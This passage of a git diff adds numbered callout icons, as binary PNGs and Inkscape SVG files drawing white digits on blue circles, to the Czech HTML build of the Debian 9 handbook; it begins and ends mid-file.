+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:center;text-anchor:middle;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 15.257917,22.008438 -8.143066,0 0,-1.784668 2.8554687,-3.07959 c 0.3596963,-0.387364 0.6861933,-0.744297 0.9794923,-1.0708 0.293289,-0.326492 0.54508,-0.644688 0.755371,-0.95459 0.210281,-0.309889 0.37353,-0.625318 0.489746,-0.946289 0.116205,-0.320956 0.174311,-0.666821 0.174317,-1.037598 -6e-6,-0.409496 -0.124518,-0.727692 -0.373536,-0.95459 -0.243495,-0.226878 -0.572759,-0.340322 -0.987793,-0.340332 -0.437178,10e-6 -0.857751,0.10792 -1.2617183,0.323731 C 9.3422244,12.379541 8.918885,12.68667 8.4761791,13.085098 L 7.0816479,11.433243 C 7.3306704,11.206366 7.5907613,10.990545 7.8619213,10.785782 8.1330785,10.575507 8.4319063,10.390123 8.7584057,10.22963 9.0849004,10.06916 9.4446006,9.9418812 9.8375072,9.8477936 10.230407,9.7481965 10.670348,9.6983918 11.157331,9.6983795 c 0.58105,1.23e-5 1.101232,0.080253 1.560547,0.2407227 0.464837,0.1604938 0.860508,0.3901488 1.187012,0.6889648 0.32649,0.293305 0.575513,0.650239 0.74707,1.070801 0.177075,0.420583 0.265617,0.893727 0.265625,1.419433 -8e-6,0.47592 -0.08302,0.932463 -0.249023,1.369629 -0.166024,0.431648 -0.392912,0.857754 -0.680664,1.278321 -0.287768,0.415044 -0.622566,0.830083 -1.004395,1.245117 -0.376308,0.40951 -0.780279,0.827315 -1.211914,1.253418 l -1.460937,1.469238 0,0.116211 4.947265,0 0,2.158203"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+    <path
+       d="m 24.554792,15.052383 c -8e-6,0.581061 -0.03321,1.162116 -0.09961,1.743164 -0.06088,0.575526 -0.174325,1.126144 -0.340332,1.651856 -0.16049,0.525719 -0.381844,1.018232 -0.664063,1.477539 -0.2767,0.453778 -0.630866,0.846681 -1.0625,1.178711 -0.426112,0.332032 -0.94076,0.59489 -1.543945,0.788574 -0.597661,0.188151 -1.300459,0.282227 -2.108398,0.282227 -0.116214,0 -0.243493,-0.0028 -0.381836,-0.0083 -0.138349,-0.0055 -0.279462,-0.01384 -0.42334,-0.0249 -0.138348,-0.0055 -0.273928,-0.0166 -0.406738,-0.0332 -0.132814,-0.01107 -0.249025,-0.02767 -0.348633,-0.0498 l 0,-2.058594 c 0.204751,0.05534 0.423338,0.09961 0.655762,0.132813 0.237953,0.02767 0.478675,0.04151 0.722168,0.0415 0.747066,2e-6 1.361324,-0.09131 1.842773,-0.273925 0.48144,-0.188149 0.863276,-0.44824 1.145508,-0.780274 0.28222,-0.337562 0.481439,-0.738766 0.597656,-1.203613 0.121738,-0.464839 0.196445,-0.97672 0.224121,-1.535645 l -0.10791,0 c -0.110683,0.199225 -0.243496,0.384609 -0.398438,0.556153 -0.154953,0.171554 -0.33757,0.320968 -0.547851,0.448242 -0.210292,0.127283 -0.448247,0.226892 -0.713867,0.298828 -0.26563,0.07194 -0.561691,0.107914 -0.888184,0.10791 -0.525719,4e-6 -0.998863,-0.08577 -1.419433,-0.257324 -0.420575,-0.171545 -0.777509,-0.420568 -1.070801,-0.74707 -0.287762,-0.326492 -0.509116,-0.727696 -0.664063,-1.203614 -0.154948,-0.475904 -0.232422,-1.020988 -0.232422,-1.635253 0,-0.65852 0.09131,-1.247875 0.273926,-1.768067 0.18815,-0.520172 0.453775,-0.960113 0.796875,-1.319824 0.343097,-0.365223 0.758136,-0.644682 1.245117,-0.838379 0.49251,-0.1936727 1.043128,-0.2905151 1.651856,-0.2905274 0.597651,1.23e-5 1.15657,0.1079224 1.676758,0.3237304 0.520175,0.210298 0.971184,0.534028 1.353027,0.971192 0.381828,0.437185 0.683423,0.990569 0.904785,1.660156 0.221346,0.669605 0.332023,1.458178 0.332031,2.365722 m -4.216796,-3.262207 c -0.226893,1.1e-5 -0.434412,0.04151 -0.622559,0.124512 -0.188155,0.08302 -0.351403,0.213063 -0.489746,0.390137 -0.132816,0.171559 -0.237959,0.392913 -0.31543,0.664062 -0.07194,0.265634 -0.107913,0.581063 -0.10791,0.946289 -3e-6,0.586596 0.124509,1.05144 0.373535,1.394532 0.24902,0.343105 0.625322,0.514654 1.128906,0.514648 0.254553,6e-6 0.486975,-0.0498 0.697266,-0.149414 0.210281,-0.0996 0.390131,-0.229648 0.539551,-0.390137 0.149408,-0.160475 0.262852,-0.340325 0.340332,-0.53955 0.083,-0.199212 0.124505,-0.401197 0.124512,-0.605958 -7e-6,-0.282218 -0.03598,-0.561677 -0.107911,-0.838378 -0.06641,-0.282218 -0.171555,-0.534008 -0.315429,-0.755372 -0.138352,-0.226878 -0.312669,-0.409495 -0.52295,-0.547851 -0.204757,-0.138336 -0.44548,-0.207509 -0.722167,-0.20752"
+       id="path2820"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/3.png b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/3.png
new file mode 100644
index 000000000..a4754f061
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/3.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/3.svg b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/3.svg
new file mode 100644
index 000000000..e2f17168d
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/3.svg
@@ -0,0 +1,27 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:start;text-anchor:start;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 19.422316,12.587051 c -9e-6,0.420582 -0.06918,0.799651 -0.20752,1.137207 -0.13282,0.33204 -0.318204,0.625334 -0.556152,0.879883 -0.23243,0.249031 -0.509122,0.459317 -0.830078,0.63086 -0.315437,0.166022 -0.658535,0.2933 -1.029297,0.381836 l 0,0.0498 c 0.979485,0.121751 1.721021,0.420579 2.224609,0.896485 0.503572,0.470382 0.755362,1.106775 0.755371,1.909179 -9e-6,0.531253 -0.09685,1.023766 -0.290527,1.477539 -0.188159,0.448244 -0.481453,0.83838 -0.879883,1.170411 -0.392911,0.332031 -0.890957,0.592122 -1.494141,0.780273 -0.597661,0.182617 -1.303227,0.273926 -2.116699,0.273926 -0.652998,0 -1.267255,-0.05534 -1.842773,-0.166016 -0.575523,-0.105143 -1.112306,-0.268392 -1.610352,-0.489746 l 0,-2.183105 c 0.249023,0.132815 0.511881,0.249025 0.788574,0.348632 0.276692,0.09961 0.553384,0.185387 0.830079,0.257325 0.27669,0.06641 0.547848,0.116212 0.813476,0.149414 0.271156,0.0332 0.525713,0.04981 0.763672,0.0498 0.475907,2e-6 0.871577,-0.04427 1.187012,-0.132812 0.315424,-0.08854 0.567214,-0.213051 0.755371,-0.373535 0.188145,-0.16048 0.320957,-0.351397 0.398437,-0.572754 0.083,-0.226885 0.124506,-0.473141 0.124512,-0.73877 -6e-6,-0.249019 -0.05258,-0.47314 -0.157715,-0.672363 -0.09962,-0.204748 -0.265631,-0.376297 -0.498047,-0.514648 -0.226893,-0.143876 -0.525721,-0.254553 -0.896484,-0.332032 -0.370773,-0.07747 -0.827315,-0.116205 -1.369629,-0.116211 l -0.863281,0 0,-1.801269 0.846679,0 c 0.509111,7e-6 0.932451,-0.04426 1.27002,-0.132813 0.33756,-0.09407 0.605952,-0.218579 0.805176,-0.373535 0.204747,-0.160474 0.348627,-0.345858 0.43164,-0.556152 0.083,-0.210278 0.124506,-0.434399 0.124512,-0.672363 -6e-6,-0.431632 -0.135585,-0.769197 -0.406738,-1.012696 -0.26563,-0.243479 -0.68897,-0.365224 -1.27002,-0.365234 -0.265629,10e-6 -0.514652,0.02768 -0.74707,0.08301 -0.226891,0.04981 -0.439944,0.116221 -0.63916,0.199218 -0.193688,0.07748 -0.373538,0.166026 -0.539551,0.265625 -0.160484,0.09409 -0.307131,0.188161 -0.439941,0.282227 l -1.294922,-1.709961 c 0.232421,-0.171538 0.484211,-0.329253 0.755371,-0.473145 0.276691,-0.143868 0.575519,-0.26838 0.896484,-0.373535 0.320961,-0.1106647 0.666827,-0.1964393 1.037598,-0.2573239 0.370765,-0.06086 0.766435,-0.091296 1.187012,-0.091309 0.597651,1.23e-5 1.139968,0.066419 1.626953,0.1992188 0.492506,0.1272911 0.913079,0.3154421 1.261718,0.5644531 0.348626,0.243501 0.617017,0.545096 0.805176,0.904786 0.193677,0.354177 0.290519,0.760914 0.290528,1.220214"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/30.png b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/30.png
new file mode 100644
index 000000000..9d3db242d
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/30.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/30.svg b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/30.svg
new file mode 100644
index 000000000..5cdcf65e8
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/30.svg
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:center;text-anchor:middle;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 14.784773,12.587051 c -8e-6,0.420582 -0.06918,0.799651 -0.20752,1.137207 -0.13282,0.33204 -0.318204,0.625334 -0.556152,0.879883 -0.232429,0.249031 -0.509122,0.459317 -0.830078,0.63086 -0.315436,0.166022 -0.658535,0.2933 -1.029297,0.381836 l 0,0.0498 c 0.979485,0.121751 1.721021,0.420579 2.224609,0.896485 0.503573,0.470382 0.755363,1.106775 0.755371,1.909179 -8e-6,0.531253 -0.09685,1.023766 -0.290527,1.477539 -0.188159,0.448244 -0.481453,0.83838 -0.879883,1.170411 -0.39291,0.332031 -0.890957,0.592122 -1.49414,0.780273 -0.597662,0.182617 -1.303228,0.273926 -2.1167,0.273926 -0.6529976,0 -1.2672548,-0.05534 -1.842773,-0.166016 C 7.9421607,21.903295 7.4053774,21.740046 6.9073315,21.518692 l 0,-2.183105 c 0.2490227,0.132815 0.5118805,0.249025 0.7885742,0.348632 0.2766912,0.09961 0.5533836,0.185387 0.8300781,0.257325 0.2766904,0.06641 0.5478489,0.116212 0.8134766,0.149414 0.2711557,0.0332 0.5257127,0.04981 0.7636716,0.0498 0.475908,2e-6 0.871578,-0.04427 1.187012,-0.132812 0.315424,-0.08854 0.567215,-0.213051 0.755371,-0.373535 0.188145,-0.16048 0.320958,-0.351397 0.398438,-0.572754 0.083,-0.226885 0.124505,-0.473141 0.124511,-0.73877 -6e-6,-0.249019 -0.05258,-0.47314 -0.157715,-0.672363 -0.09962,-0.204748 -0.26563,-0.376297 -0.498046,-0.514648 C 11.685809,16.992 11.386981,16.881323 11.016218,16.803844 10.645446,16.726374 10.188903,16.687639 9.6465893,16.687633 l -0.8632813,0 0,-1.801269 0.8466797,0 c 0.5091113,7e-6 0.9324503,-0.04426 1.2700193,-0.132813 0.337561,-0.09407 0.605952,-0.218579 0.805176,-0.373535 0.204747,-0.160474 0.348627,-0.345858 0.431641,-0.556152 0.083,-0.210278 0.124506,-0.434399 0.124511,-0.672363 -5e-6,-0.431632 -0.135585,-0.769197 -0.406738,-1.012696 -0.26563,-0.243479 -0.688969,-0.365224 -1.270019,-0.365234 -0.265629,10e-6 -0.514653,0.02768 -0.7470708,0.08301 -0.2268911,0.04981 -0.4399443,0.116221 -0.6391601,0.199218 -0.1936875,0.07748 -0.3735376,0.166026 -0.5395508,0.265625 -0.1604838,0.09409 -0.3071308,0.188161 -0.4399414,0.282227 L 6.923933,10.893692 c 0.2324212,-0.171538 0.4842113,-0.329253 0.7553711,-0.473145 0.2766912,-0.143868 0.575519,-0.26838 0.8964844,-0.373535 0.3209611,-0.1106647 0.6668266,-0.1964393 1.0375977,-0.2573239 0.3707646,-0.06086 0.7664348,-0.091296 1.1870118,-0.091309 0.597651,1.23e-5 1.139968,0.066419 1.626953,0.1992188 0.492507,0.1272911 0.913079,0.3154421 1.261719,0.5644531 0.348625,0.243501 0.617017,0.545096 0.805176,0.904786 0.193676,0.354177 0.290519,0.760914 0.290527,1.220214"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+    <path
+       d="m 24.6378,15.940567 c -9e-6,0.979497 -0.07748,1.853845 -0.232422,2.623047 -0.149422,0.769208 -0.392912,1.422202 -0.730468,1.958984 -0.332039,0.536785 -0.763679,0.94629 -1.294922,1.228516 -0.525722,0.282226 -1.162115,0.42334 -1.90918,0.42334 -0.702803,0 -1.314294,-0.141114 -1.834473,-0.42334 -0.520184,-0.282226 -0.951824,-0.691731 -1.294922,-1.228516 -0.3431,-0.536782 -0.600424,-1.189776 -0.771972,-1.958984 -0.166016,-0.769202 -0.249024,-1.64355 -0.249024,-2.623047 0,-0.979485 0.07471,-1.8566 0.224121,-2.631348 0.154948,-0.77473 0.398437,-1.430491 0.730469,-1.967285 0.33203,-0.536772 0.760903,-0.946277 1.286621,-1.228515 0.525713,-0.2877487 1.162106,-0.4316287 1.90918,-0.431641 0.69726,1.23e-5 1.305984,0.1411254 1.826172,0.42334 0.520175,0.282238 0.954582,0.691743 1.303223,1.228515 0.348624,0.536794 0.608715,1.192555 0.780273,1.967286 0.171541,0.774747 0.257315,1.654629 0.257324,2.639648 m -5.760742,0 c -3e-6,1.383468 0.118975,2.423832 0.356934,3.121094 0.237952,0.697268 0.650223,1.0459 1.236816,1.045898 0.575516,2e-6 0.987787,-0.345863 1.236816,-1.037597 0.254552,-0.691729 0.38183,-1.734859 0.381836,-3.129395 -6e-6,-1.38899 -0.127284,-2.43212 -0.381836,-3.129395 -0.249029,-0.702789 -0.6613,-1.054188 -1.236816,-1.054199 -0.293299,1.1e-5 -0.542322,0.08855 -0.74707,0.265625 -0.199223,0.177093 -0.362471,0.439951 -0.489746,0.788574 -0.127282,0.348642 -0.218591,0.785816 -0.273926,1.311524 -0.05534,0.52019 -0.08301,1.126146 -0.08301,1.817871"
+       id="path2820"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/31.png b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/31.png
new file mode 100644
index 000000000..9e2675da5
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/31.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/31.svg b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/31.svg
new file mode 100644
index 000000000..f0fdb294d
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/31.svg
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:center;text-anchor:middle;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 14.784773,12.587051 c -8e-6,0.420582 -0.06918,0.799651 -0.20752,1.137207 -0.13282,0.33204 -0.318204,0.625334 -0.556152,0.879883 -0.232429,0.249031 -0.509122,0.459317 -0.830078,0.63086 -0.315436,0.166022 -0.658535,0.2933 -1.029297,0.381836 l 0,0.0498 c 0.979485,0.121751 1.721021,0.420579 2.224609,0.896485 0.503573,0.470382 0.755363,1.106775 0.755371,1.909179 -8e-6,0.531253 -0.09685,1.023766 -0.290527,1.477539 -0.188159,0.448244 -0.481453,0.83838 -0.879883,1.170411 -0.39291,0.332031 -0.890957,0.592122 -1.49414,0.780273 -0.597662,0.182617 -1.303228,0.273926 -2.1167,0.273926 -0.6529976,0 -1.2672548,-0.05534 -1.842773,-0.166016 C 7.9421607,21.903295 7.4053774,21.740046 6.9073315,21.518692 l 0,-2.183105 c 0.2490227,0.132815 0.5118805,0.249025 0.7885742,0.348632 0.2766912,0.09961 0.5533836,0.185387 0.8300781,0.257325 0.2766904,0.06641 0.5478489,0.116212 0.8134766,0.149414 0.2711557,0.0332 0.5257127,0.04981 0.7636716,0.0498 0.475908,2e-6 0.871578,-0.04427 1.187012,-0.132812 0.315424,-0.08854 0.567215,-0.213051 0.755371,-0.373535 0.188145,-0.16048 0.320958,-0.351397 0.398438,-0.572754 0.083,-0.226885 0.124505,-0.473141 0.124511,-0.73877 -6e-6,-0.249019 -0.05258,-0.47314 -0.157715,-0.672363 -0.09962,-0.204748 -0.26563,-0.376297 -0.498046,-0.514648 C 11.685809,16.992 11.386981,16.881323 11.016218,16.803844 10.645446,16.726374 10.188903,16.687639 9.6465893,16.687633 l -0.8632813,0 0,-1.801269 0.8466797,0 c 0.5091113,7e-6 0.9324503,-0.04426 1.2700193,-0.132813 0.337561,-0.09407 0.605952,-0.218579 0.805176,-0.373535 0.204747,-0.160474 0.348627,-0.345858 0.431641,-0.556152 0.083,-0.210278 0.124506,-0.434399 0.124511,-0.672363 -5e-6,-0.431632 -0.135585,-0.769197 -0.406738,-1.012696 -0.26563,-0.243479 -0.688969,-0.365224 -1.270019,-0.365234 -0.265629,10e-6 -0.514653,0.02768 -0.7470708,0.08301 -0.2268911,0.04981 -0.4399443,0.116221 -0.6391601,0.199218 -0.1936875,0.07748 -0.3735376,0.166026 -0.5395508,0.265625 -0.1604838,0.09409 -0.3071308,0.188161 -0.4399414,0.282227 L 6.923933,10.893692 c 0.2324212,-0.171538 0.4842113,-0.329253 0.7553711,-0.473145 0.2766912,-0.143868 0.575519,-0.26838 0.8964844,-0.373535 0.3209611,-0.1106647 0.6668266,-0.1964393 1.0375977,-0.2573239 0.3707646,-0.06086 0.7664348,-0.091296 1.1870118,-0.091309 0.597651,1.23e-5 1.139968,0.066419 1.626953,0.1992188 0.492507,0.1272911 0.913079,0.3154421 1.261719,0.5644531 0.348625,0.243501 0.617017,0.545096 0.805176,0.904786 0.193676,0.354177 0.290519,0.760914 0.290527,1.220214"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+    <path
+       d="m 22.579206,22.008438 -2.564941,0 0,-7.022461 c -4e-6,-0.143873 -4e-6,-0.315422 0,-0.514648 0.0055,-0.204745 0.01106,-0.415031 0.0166,-0.63086 0.01106,-0.221345 0.01936,-0.442699 0.0249,-0.664062 0.01106,-0.221345 0.01936,-0.423331 0.0249,-0.605957 -0.02767,0.03321 -0.07471,0.08302 -0.141113,0.149414 -0.06641,0.06642 -0.141117,0.141122 -0.224121,0.224121 -0.08301,0.07748 -0.168786,0.157724 -0.257324,0.240723 -0.08855,0.08302 -0.17432,0.157723 -0.257325,0.224121 l -1.394531,1.120605 -1.245117,-1.543945 3.909668,-3.1127931 2.108398,0 0,12.1357421"
+       id="path2820"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/32.png b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/32.png
new file mode 100644
index 000000000..20f1bb23c
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/32.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/32.svg b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/32.svg
new file mode 100644
index 000000000..938292810
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/32.svg
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:center;text-anchor:middle;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 14.784773,12.587051 c -8e-6,0.420582 -0.06918,0.799651 -0.20752,1.137207 -0.13282,0.33204 -0.318204,0.625334 -0.556152,0.879883 -0.232429,0.249031 -0.509122,0.459317 -0.830078,0.63086 -0.315436,0.166022 -0.658535,0.2933 -1.029297,0.381836 l 0,0.0498 c 0.979485,0.121751 1.721021,0.420579 2.224609,0.896485 0.503573,0.470382 0.755363,1.106775 0.755371,1.909179 -8e-6,0.531253 -0.09685,1.023766 -0.290527,1.477539 -0.188159,0.448244 -0.481453,0.83838 -0.879883,1.170411 -0.39291,0.332031 -0.890957,0.592122 -1.49414,0.780273 -0.597662,0.182617 -1.303228,0.273926 -2.1167,0.273926 -0.6529976,0 -1.2672548,-0.05534 -1.842773,-0.166016 C 7.9421607,21.903295 7.4053774,21.740046 6.9073315,21.518692 l 0,-2.183105 c 0.2490227,0.132815 0.5118805,0.249025 0.7885742,0.348632 0.2766912,0.09961 0.5533836,0.185387 0.8300781,0.257325 0.2766904,0.06641 0.5478489,0.116212 0.8134766,0.149414 0.2711557,0.0332 0.5257127,0.04981 0.7636716,0.0498 0.475908,2e-6 0.871578,-0.04427 1.187012,-0.132812 0.315424,-0.08854 0.567215,-0.213051 0.755371,-0.373535 0.188145,-0.16048 0.320958,-0.351397 0.398438,-0.572754 0.083,-0.226885 0.124505,-0.473141 0.124511,-0.73877 -6e-6,-0.249019 -0.05258,-0.47314 -0.157715,-0.672363 -0.09962,-0.204748 -0.26563,-0.376297 -0.498046,-0.514648 C 11.685809,16.992 11.386981,16.881323 11.016218,16.803844 10.645446,16.726374 10.188903,16.687639 9.6465893,16.687633 l -0.8632813,0 0,-1.801269 0.8466797,0 c 0.5091113,7e-6 0.9324503,-0.04426 1.2700193,-0.132813 0.337561,-0.09407 0.605952,-0.218579 0.805176,-0.373535 0.204747,-0.160474 0.348627,-0.345858 0.431641,-0.556152 0.083,-0.210278 0.124506,-0.434399 0.124511,-0.672363 -5e-6,-0.431632 -0.135585,-0.769197 -0.406738,-1.012696 -0.26563,-0.243479 -0.688969,-0.365224 -1.270019,-0.365234 -0.265629,10e-6 -0.514653,0.02768 -0.7470708,0.08301 -0.2268911,0.04981 -0.4399443,0.116221 -0.6391601,0.199218 -0.1936875,0.07748 -0.3735376,0.166026 -0.5395508,0.265625 -0.1604838,0.09409 -0.3071308,0.188161 -0.4399414,0.282227 L 6.923933,10.893692 c 0.2324212,-0.171538 0.4842113,-0.329253 0.7553711,-0.473145 0.2766912,-0.143868 0.575519,-0.26838 0.8964844,-0.373535 0.3209611,-0.1106647 0.6668266,-0.1964393 1.0375977,-0.2573239 0.3707646,-0.06086 0.7664348,-0.091296 1.1870118,-0.091309 0.597651,1.23e-5 1.139968,0.066419 1.626953,0.1992188 0.492507,0.1272911 0.913079,0.3154421 1.261719,0.5644531 0.348625,0.243501 0.617017,0.545096 0.805176,0.904786 0.193676,0.354177 0.290519,0.760914 0.290527,1.220214"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+    <path
+       d="m 24.621199,22.008438 -8.143067,0 0,-1.784668 2.855469,-3.07959 c 0.359697,-0.387364 0.686194,-0.744297 0.979492,-1.0708 0.29329,-0.326492 0.54508,-0.644688 0.755371,-0.95459 0.210281,-0.309889 0.37353,-0.625318 0.489746,-0.946289 0.116205,-0.320956 0.174311,-0.666821 0.174317,-1.037598 -6e-6,-0.409496 -0.124518,-0.727692 -0.373535,-0.95459 -0.243495,-0.226878 -0.572759,-0.340322 -0.987793,-0.340332 -0.437179,10e-6 -0.857751,0.10792 -1.261719,0.323731 -0.403974,0.215829 -0.827314,0.522958 -1.27002,0.921386 l -1.394531,-1.651855 c 0.249023,-0.226877 0.509114,-0.442698 0.780274,-0.647461 0.271157,-0.210275 0.569985,-0.395659 0.896484,-0.556152 0.326495,-0.16047 0.686195,-0.2877488 1.079101,-0.3818364 0.3929,-0.099597 0.832841,-0.1494018 1.319825,-0.1494141 0.581049,1.23e-5 1.101231,0.080253 1.560547,0.2407227 0.464837,0.1604938 0.860507,0.3901488 1.187011,0.6889648 0.32649,0.293305 0.575513,0.650239 0.747071,1.070801 0.177075,0.420583 0.265616,0.893727 0.265625,1.419433 -9e-6,0.47592 -0.08302,0.932463 -0.249024,1.369629 -0.166024,0.431648 -0.392911,0.857754 -0.680664,1.278321 -0.287768,0.415044 -0.622565,0.830083 -1.004394,1.245117 -0.376309,0.40951 -0.78028,0.827315 -1.211914,1.253418 l -1.460938,1.469238 0,0.116211 4.947266,0 0,2.158203"
+       id="path2820"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/33.png b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/33.png
new file mode 100644
index 000000000..01407e6bc
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/33.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/33.svg b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/33.svg
new file mode 100644
index 000000000..f46815f7e
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/33.svg
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:center;text-anchor:middle;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 14.784773,12.587051 c -8e-6,0.420582 -0.06918,0.799651 -0.20752,1.137207 -0.13282,0.33204 -0.318204,0.625334 -0.556152,0.879883 -0.232429,0.249031 -0.509122,0.459317 -0.830078,0.63086 -0.315436,0.166022 -0.658535,0.2933 -1.029297,0.381836 l 0,0.0498 c 0.979485,0.121751 1.721021,0.420579 2.224609,0.896485 0.503573,0.470382 0.755363,1.106775 0.755371,1.909179 -8e-6,0.531253 -0.09685,1.023766 -0.290527,1.477539 -0.188159,0.448244 -0.481453,0.83838 -0.879883,1.170411 -0.39291,0.332031 -0.890957,0.592122 -1.49414,0.780273 -0.597662,0.182617 -1.303228,0.273926 -2.1167,0.273926 -0.6529976,0 -1.2672548,-0.05534 -1.842773,-0.166016 C 7.9421607,21.903295 7.4053774,21.740046 6.9073315,21.518692 l 0,-2.183105 c 0.2490227,0.132815 0.5118805,0.249025 0.7885742,0.348632 0.2766912,0.09961 0.5533836,0.185387 0.8300781,0.257325 